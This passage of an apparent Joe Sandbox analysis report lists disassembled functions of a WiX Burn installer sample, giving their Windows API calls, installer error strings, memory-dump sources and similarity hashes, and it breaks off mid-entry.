                                                                                                                                                                    Function 009141EC Relevance: 17.6, APIs: 4, Strings: 6, Instructions: 55COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                      • Part of subcall function 00940523: EnterCriticalSection.KERNEL32(0096B5FC,00000000,?,?,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 00940533
                                                                                                                                                                      • Part of subcall function 00940523: LeaveCriticalSection.KERNEL32(0096B5FC,?,?,0096B5F4,?,00914207,00000000,Setup,_Failed,txt,00000000,00000000,00000000,00000001,009054FA,?), ref: 0094067A
                                                                                                                                                                    • OpenEventLogW.ADVAPI32(00000000,Application), ref: 00914212
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,00000000,?,?,?,?,?,?), ref: 0091421E
                                                                                                                                                                    • ReportEventW.ADVAPI32(00000000,00000001,00000001,00000001,00000000,00000001,00000000,009539D4,00000000), ref: 0091426B
                                                                                                                                                                    • CloseEventLog.ADVAPI32(00000000), ref: 00914272
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Event$CriticalSection$CloseEnterErrorLastLeaveOpenReport
                                                                                                                                                                    • String ID: Application$Failed to open Application event log$Setup$_Failed$logging.cpp$txt
                                                                                                                                                                    • API String ID: 1844635321-1389066741
                                                                                                                                                                    • Opcode ID: c4042ace58dc65f8990a9cbb7243d92fbbc516f8ce5db08dbc27cb6f3e191ada
                                                                                                                                                                    • Instruction ID: 24e173a8d620f52dc30d43279cd596078eda7703a0124556e13fbaf1f74327ab
                                                                                                                                                                    • Opcode Fuzzy Hash: c4042ace58dc65f8990a9cbb7243d92fbbc516f8ce5db08dbc27cb6f3e191ada
                                                                                                                                                                    • Instruction Fuzzy Hash: ACF0D136B812717A573162671C0AEBF1A2CDACAFB73014418FD20E6080DB60CD8586F5
                                                                                                                                                                    Function 009193FE Relevance: 16.7, APIs: 2, Strings: 9, Instructions: 226COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,?,00000000,00000000,00000003,00000000,00000000), ref: 0091949E
                                                                                                                                                                    • GetLastError.KERNEL32(000007D0,000007D0,00000000,00000000,000007D0,00000001), ref: 009194C6
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast
                                                                                                                                                                    • String ID: $$0$Could not close verify handle.$Could not verify file %ls.$Failed to allocate memory$Failed to allocate string.$Failed to encode file hash.$Failed to get file hash.$cache.cpp
                                                                                                                                                                    • API String ID: 1452528299-4263581490
                                                                                                                                                                    • Opcode ID: 597e8ab62f244c3b8b773bc970061b401ed3982ca236247dc7c3bb6cbcfe4ce9
                                                                                                                                                                    • Instruction ID: 46aa243ebf1b31b1a7622c58f9d6bc7e91ad304ab171975df6adc8b1522ad062
                                                                                                                                                                    • Opcode Fuzzy Hash: 597e8ab62f244c3b8b773bc970061b401ed3982ca236247dc7c3bb6cbcfe4ce9
                                                                                                                                                                    • Instruction Fuzzy Hash: C7719072E0022DABDB11DFE5C855FEEBBB8AB48760F110125FD11BB291E7349D448BA0
                                                                                                                                                                    Function 0091E56C Relevance: 16.6, APIs: 11, Instructions: 86windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetWindowLongW.USER32(?,000000EB), ref: 0091E577
                                                                                                                                                                    • DefWindowProcW.USER32(?,00000082,?,?), ref: 0091E5B5
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,00000000), ref: 0091E5C2
                                                                                                                                                                    • SetWindowLongW.USER32(?,000000EB,?), ref: 0091E5D1
                                                                                                                                                                    • DefWindowProcW.USER32(?,?,?,?), ref: 0091E5DF
                                                                                                                                                                    • CreateCompatibleDC.GDI32(?), ref: 0091E5EB
                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0091E5FC
                                                                                                                                                                    • StretchBlt.GDI32(?,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00CC0020), ref: 0091E61E
                                                                                                                                                                    • SelectObject.GDI32(00000000,00000000), ref: 0091E626
                                                                                                                                                                    • DeleteDC.GDI32(00000000), ref: 0091E629
                                                                                                                                                                    • PostQuitMessage.USER32(00000000), ref: 0091E637
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Window$Long$ObjectProcSelect$CompatibleCreateDeleteMessagePostQuitStretch
                                                                                                                                                                    • String ID:
                                                                                                                                                                    • API String ID: 409979828-0
                                                                                                                                                                    • Opcode ID: 69b0d980b90017574ca38c9325e505b0aed386f115fd781de0d178e63f2bf4cc
                                                                                                                                                                    • Instruction ID: 8a3e717f7200a48a56c57c8bee343ae1104d45d7f75e1ddf537fcf449d49521c
                                                                                                                                                                    • Opcode Fuzzy Hash: 69b0d980b90017574ca38c9325e505b0aed386f115fd781de0d178e63f2bf4cc
                                                                                                                                                                    • Instruction Fuzzy Hash: 05218C36218108BFDB255F69DC1CDBB3F69EF4A361B054518FA1A971B4D7318850EB60
                                                                                                                                                                    Function 0091A13A Relevance: 16.0, APIs: 1, Strings: 8, Instructions: 222COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    Strings
                                                                                                                                                                    • WixBundleLastUsedSource, xrefs: 0091A1A1
                                                                                                                                                                    • WixBundleLayoutDirectory, xrefs: 0091A26C
                                                                                                                                                                    • Failed to copy source path., xrefs: 0091A31A
                                                                                                                                                                    • Failed to combine last source with source., xrefs: 0091A210
                                                                                                                                                                    • Failed to combine layout source with source., xrefs: 0091A2A4
                                                                                                                                                                    • Failed to get current process directory., xrefs: 0091A1F3
                                                                                                                                                                    • WixBundleOriginalSource, xrefs: 0091A1B7
                                                                                                                                                                    • Failed to get bundle layout directory property., xrefs: 0091A287
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Find$CloseFileFirstlstrlen
                                                                                                                                                                    • String ID: Failed to combine last source with source.$Failed to combine layout source with source.$Failed to copy source path.$Failed to get bundle layout directory property.$Failed to get current process directory.$WixBundleLastUsedSource$WixBundleLayoutDirectory$WixBundleOriginalSource
                                                                                                                                                                    • API String ID: 2767606509-3003062821
                                                                                                                                                                    • Opcode ID: 4f196a8d39d0fb5ae0fe6153b876794491fd34daf85e0184f04c1e07b7633f97
                                                                                                                                                                    • Instruction ID: 8bee6720963057f54d5569c37aec38ffdba299355aa6b0142a4903a4bed0671e
                                                                                                                                                                    • Opcode Fuzzy Hash: 4f196a8d39d0fb5ae0fe6153b876794491fd34daf85e0184f04c1e07b7633f97
                                                                                                                                                                    • Instruction Fuzzy Hash: B5719E71E0621DAFCF12DFA4C841AEEB7B9AF48310F510529E921B7290E7759D81CB62
                                                                                                                                                                    Function 00902DBF Relevance: 16.0, APIs: 7, Strings: 2, Instructions: 203sleepfiletimeCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • GetTempPathW.KERNEL32(00000104,?,00000000,00000000,00000000), ref: 00902E5F
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00902E69
                                                                                                                                                                    • GetLocalTime.KERNEL32(?,?,?,?,?,?), ref: 00902F09
                                                                                                                                                                    • CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000001,00000080,00000000), ref: 00902F96
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00902FA3
                                                                                                                                                                    • Sleep.KERNEL32(00000064), ref: 00902FB7
                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 0090301F
                                                                                                                                                                    Strings
                                                                                                                                                                    • pathutil.cpp, xrefs: 00902E8D
                                                                                                                                                                    • %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls, xrefs: 00902F66
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorLast$CloseCreateFileHandleLocalPathSleepTempTime
                                                                                                                                                                    • String ID: %ls_%04u%02u%02u%02u%02u%02u%ls%ls%ls$pathutil.cpp
                                                                                                                                                                    • API String ID: 3480017824-1101990113
                                                                                                                                                                    • Opcode ID: d90be68d98d83fbf6efecd92ed5219ea3385d8264655efb5d61f48f1a8b3d045
                                                                                                                                                                    • Instruction ID: 6e615c9e002da5e3d725a4251c5f7152aa6a9e8299d25b65e9ce032728fac41d
                                                                                                                                                                    • Opcode Fuzzy Hash: d90be68d98d83fbf6efecd92ed5219ea3385d8264655efb5d61f48f1a8b3d045
                                                                                                                                                                    • Instruction Fuzzy Hash: 49715176D41229AFDB319BA8DC4DBAAB7BCAB08710F1141A5FA04A71D0D7749E809F90
                                                                                                                                                                    Function 0090CBC5 Relevance: 15.9, APIs: 1, Strings: 8, Instructions: 144COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,FFFEB88D,000000FF,00000001,000000FF,?,00000001,009053BD,00000000,00905489,00905445,WixBundleUILevel,840F01E8,?,00000001), ref: 0090CC1C
                                                                                                                                                                    Strings
                                                                                                                                                                    • Payload was not found in container: %ls, xrefs: 0090CD29
                                                                                                                                                                    • payload.cpp, xrefs: 0090CD1D
                                                                                                                                                                    • Failed to ensure directory exists, xrefs: 0090CCEE
                                                                                                                                                                    • Failed to extract file., xrefs: 0090CCE7
                                                                                                                                                                    • Failed to find embedded payload: %ls, xrefs: 0090CC48
                                                                                                                                                                    • Failed to get directory portion of local file path, xrefs: 0090CCF5
                                                                                                                                                                    • Failed to get next stream., xrefs: 0090CD03
                                                                                                                                                                    • Failed to concat file paths., xrefs: 0090CCFC
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: CompareString
                                                                                                                                                                    • String ID: Failed to concat file paths.$Failed to ensure directory exists$Failed to extract file.$Failed to find embedded payload: %ls$Failed to get directory portion of local file path$Failed to get next stream.$Payload was not found in container: %ls$payload.cpp
                                                                                                                                                                    • API String ID: 1825529933-1711239286
                                                                                                                                                                    • Opcode ID: 5c52a455e03a67159b0625f525fe4a6de124374e19a65db2f0ff6bacf43ad7d3
                                                                                                                                                                    • Instruction ID: 6ae54984b38d7e510aa3064a533928446fce17982eb1e0d0dd35ef2d7a697d76
                                                                                                                                                                    • Opcode Fuzzy Hash: 5c52a455e03a67159b0625f525fe4a6de124374e19a65db2f0ff6bacf43ad7d3
                                                                                                                                                                    • Instruction Fuzzy Hash: D441F5B1900229EFCF259F88CC81E6EBBA9BF80710F118675E955AB2E1D3709D40DB90
                                                                                                                                                                    Function 00904796 Relevance: 15.9, APIs: 3, Strings: 6, Instructions: 128windowthreadCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • PeekMessageW.USER32(00000000,00000000,00000400,00000400,00000000), ref: 009047BB
                                                                                                                                                                    • GetCurrentThreadId.KERNEL32 ref: 009047C1
                                                                                                                                                                    • GetMessageW.USER32(00000000,00000000,00000000,00000000), ref: 0090484F
                                                                                                                                                                    Strings
                                                                                                                                                                    • wininet.dll, xrefs: 009047EE
                                                                                                                                                                    • Failed to load UX., xrefs: 00904804
                                                                                                                                                                    • Failed to create engine for UX., xrefs: 009047DB
                                                                                                                                                                    • Failed to start bootstrapper application., xrefs: 0090481D
                                                                                                                                                                    • engine.cpp, xrefs: 0090489B
                                                                                                                                                                    • Unexpected return value from message pump., xrefs: 009048A5
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Message$CurrentPeekThread
                                                                                                                                                                    • String ID: Failed to create engine for UX.$Failed to load UX.$Failed to start bootstrapper application.$Unexpected return value from message pump.$engine.cpp$wininet.dll
                                                                                                                                                                    • API String ID: 673430819-2573580774
                                                                                                                                                                    • Opcode ID: 9905d1e9b0dc33bfd6a9ff18c323fe5894c6891436062a72c2996747707bb1f1
                                                                                                                                                                    • Instruction ID: dcd5d7269a5eb0cd4255656b00dff8ced0a631c0f1f40b9333be165660dcaedd
                                                                                                                                                                    • Opcode Fuzzy Hash: 9905d1e9b0dc33bfd6a9ff18c323fe5894c6891436062a72c2996747707bb1f1
                                                                                                                                                                    • Instruction Fuzzy Hash: E341C2B1A00559BFEB109BA4CC85FBAB7ACEF48314F108925FA04E71D0DB35ED0587A0
                                                                                                                                                                    Function 00929C84 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 128COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • SetFileAttributesW.KERNEL32(00000000,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000,?,?,0092B03E,?,00000001,00000000), ref: 00929D0F
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0092B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00929D19
                                                                                                                                                                    • CopyFileExW.KERNEL32(00000000,00000000,00929B69,?,?,00000000,00000000,00000000,?,?,?,00000000,00000000,00000000), ref: 00929D67
                                                                                                                                                                    • GetLastError.KERNEL32(?,?,?,00000000,00000000,00000000,?,?,0092B03E,?,00000001,00000000,00000000,00000000,00000001,00000000), ref: 00929D96
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLast$AttributesCopy
                                                                                                                                                                    • String ID: BA aborted copy of payload from: '%ls' to: %ls.$Failed attempt to copy payload from: '%ls' to: %ls.$Failed to clear readonly bit on payload destination path: %ls$apply.cpp$copy
                                                                                                                                                                    • API String ID: 1969131206-836986073
                                                                                                                                                                    • Opcode ID: bdcc1f9103d13af6fb6c4d796652aed4f4a83aa074d4356692504a6f4cef93da
                                                                                                                                                                    • Instruction ID: 2fdee664eda8730890a845bf199d4084a3a421109e0d6f565976c8d56dc539e5
                                                                                                                                                                    • Opcode Fuzzy Hash: bdcc1f9103d13af6fb6c4d796652aed4f4a83aa074d4356692504a6f4cef93da
                                                                                                                                                                    • Instruction Fuzzy Hash: C5311772A41235BBDB20DA56EC45E6B77ACAF81B21F148158BD09EB289D631CD00D7E0
                                                                                                                                                                    Function 00918EBC Relevance: 15.9, APIs: 2, Strings: 7, Instructions: 126COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LocalFree.KERNEL32(00000000,?,00000001,80000005,?,00000000,00000000,00000000,00000003,000007D0), ref: 00919007
                                                                                                                                                                    Strings
                                                                                                                                                                    • Failed to allocate access for Users group to path: %ls, xrefs: 00918F72
                                                                                                                                                                    • cache.cpp, xrefs: 00918FB0
                                                                                                                                                                    • Failed to allocate access for Everyone group to path: %ls, xrefs: 00918F51
                                                                                                                                                                    • Failed to allocate access for SYSTEM group to path: %ls, xrefs: 00918F30
                                                                                                                                                                    • Failed to secure cache path: %ls, xrefs: 00918FEA
                                                                                                                                                                    • Failed to create ACL to secure cache path: %ls, xrefs: 00918FBB
                                                                                                                                                                    • Failed to allocate access for Administrators group to path: %ls, xrefs: 00918F0F
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: FreeLocal
                                                                                                                                                                    • String ID: Failed to allocate access for Administrators group to path: %ls$Failed to allocate access for Everyone group to path: %ls$Failed to allocate access for SYSTEM group to path: %ls$Failed to allocate access for Users group to path: %ls$Failed to create ACL to secure cache path: %ls$Failed to secure cache path: %ls$cache.cpp
                                                                                                                                                                    • API String ID: 2826327444-4113288589
                                                                                                                                                                    • Opcode ID: 0ec58a57c0e72abcee6aa295454990024cb8550d1215ec87f606ef03a873210d
                                                                                                                                                                    • Instruction ID: f277794a911b674f24fefbb37bfec7ec465c828085b2740369ade2170c339784
                                                                                                                                                                    • Opcode Fuzzy Hash: 0ec58a57c0e72abcee6aa295454990024cb8550d1215ec87f606ef03a873210d
                                                                                                                                                                    • Instruction Fuzzy Hash: A441F532B4432DB7DB2196508C06FEBB66CEB84B11F114064FE04BA281DF719E85ABE0
                                                                                                                                                                    Function 0091492F Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 117fileCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • ReadFile.KERNEL32(00000000,crypt32.dll,00000008,?,00000000,?,00000000,00000000,crypt32.dll,00000000,?,?,?,00000000,?,00000000), ref: 0091495A
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914967
                                                                                                                                                                    • ReadFile.KERNEL32(?,00000000,?,?,00000000,?,00000000), ref: 00914A12
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 00914A1C
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: ErrorFileLastRead
                                                                                                                                                                    • String ID: Failed to allocate data for message.$Failed to read data for message.$Failed to read message from pipe.$crypt32.dll$pipe.cpp
                                                                                                                                                                    • API String ID: 1948546556-773887359
                                                                                                                                                                    • Opcode ID: 54a2bc10260390939a1e35c043d04e8acbf0f19aaf090cb8f1d9529159a8a50e
                                                                                                                                                                    • Instruction ID: 85af0ffaad39f74e549108473683fff9374af92a363e164dd0745c75a0a072b5
                                                                                                                                                                    • Opcode Fuzzy Hash: 54a2bc10260390939a1e35c043d04e8acbf0f19aaf090cb8f1d9529159a8a50e
                                                                                                                                                                    • Instruction Fuzzy Hash: 3031F532F4422DABDB109AA5CC45BEEB76CAF08B25F118125FD54A6180D7749D809BD0
                                                                                                                                                                    Function 00946C29 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 114COMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,name,000000FF,00000000,00000000,00000000,?,74DEDFD0), ref: 00946C88
                                                                                                                                                                    • CompareStringW.KERNEL32(0000007F,00000000,00000000,000000FF,email,000000FF), ref: 00946CA5
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946CE3
                                                                                                                                                                    • SysFreeString.OLEAUT32(00000000), ref: 00946D27
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: String$CompareFree
                                                                                                                                                                    • String ID: `<u$email$name$uri
                                                                                                                                                                    • API String ID: 3589242889-1197142144
                                                                                                                                                                    • Opcode ID: 495ba3695cb5f0aaae26b28b0f2277a97275695ff8690cde31495cd5deaa1d33
                                                                                                                                                                    • Instruction ID: 1db98aee832bcefdc7ec98e313b4a456cf824ed3cf2bc9bad824c13115251127
                                                                                                                                                                    • Opcode Fuzzy Hash: 495ba3695cb5f0aaae26b28b0f2277a97275695ff8690cde31495cd5deaa1d33
                                                                                                                                                                    • Instruction Fuzzy Hash: 2C41A075E05219BBCB119B94CD84FADB778EF46725F2042A4EA50AB1D0C7319E00DB51
                                                                                                                                                                    Function 0091E2AF Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 104windowCOMMON
                                                                                                                                                                    Download Yara Rule
                                                                                                                                                                    APIs
                                                                                                                                                                    • LoadBitmapW.USER32(?,00000001), ref: 0091E2E5
                                                                                                                                                                    • GetLastError.KERNEL32 ref: 0091E2F1
                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 0091E338
                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 0091E359
                                                                                                                                                                    • MonitorFromPoint.USER32(?,?,00000002), ref: 0091E36B
                                                                                                                                                                    • GetMonitorInfoW.USER32(00000000,?), ref: 0091E381
                                                                                                                                                                    Strings
                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                    • Source File: 00000000.00000002.2022960837.0000000000901000.00000020.00000001.01000000.00000003.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                                    • Associated: 00000000.00000002.2022941110.0000000000900000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023002731.000000000094B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023030019.000000000096A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    • Associated: 00000000.00000002.2023049401.000000000096D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                    • Snapshot File: hcaresult_0_2_900000_w3245.jbxd
                                                                                                                                                                    Similarity
                                                                                                                                                                    • API ID: Monitor$BitmapCursorErrorFromInfoLastLoadObjectPoint
                                                                                                                                                                    • String ID: ($Failed to load splash screen bitmap.$splashscreen.cpp
                                                                                                                                                                    • API String ID: 2342928100-598475503
                                                                                                                                                                    • Opcode ID: 5f98120171c245a1957472388bd7d6e65e3157efefd2dd0517904795e56794a1
                                                                                                                                                                    • Instruction ID: 85199e017f723e61440025b80f496125da9b4b84001edb92ca94c0f37c9ea72f
